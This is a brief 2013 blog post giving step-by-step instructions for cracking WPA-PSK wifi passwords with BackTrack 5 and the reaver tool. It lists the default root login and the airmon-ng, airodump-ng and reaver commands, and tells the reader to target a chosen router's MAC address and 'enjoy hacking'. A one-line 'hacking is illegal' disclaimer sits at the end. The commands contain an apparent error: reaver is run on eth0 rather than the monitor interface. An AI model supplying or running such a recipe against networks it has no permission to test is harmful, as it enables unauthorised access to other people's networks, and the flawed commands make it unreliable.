Wednesday 19 June 2013

WPA wifi cracking

(wifi)WPA-PSK Cracking using "reaver" tool (without using dictionary)
steps-
1.boot your system with backtrack5R2 or bt5R3
2.username -root,password-toor
3.startx
4.open terminal window and run the following commands
"now hacking begins"

airmon-ng
airmon-ng start wlan0
airodump-ng  mon0
reaver -i eth0 -b <bssid> -vv

 At place of <bssid> we have to paste the MAC address of the wifi modem on which we are applying attack,MAC address displayed after running the second command.these 4 commands we have to run and the attack will begin to capture packets,after capturing the password it will automatically stop....the password will be in plain text formate...so enjoy hacking...
The relevent video i'll post soon...by Arjun

Note:hacking is illegal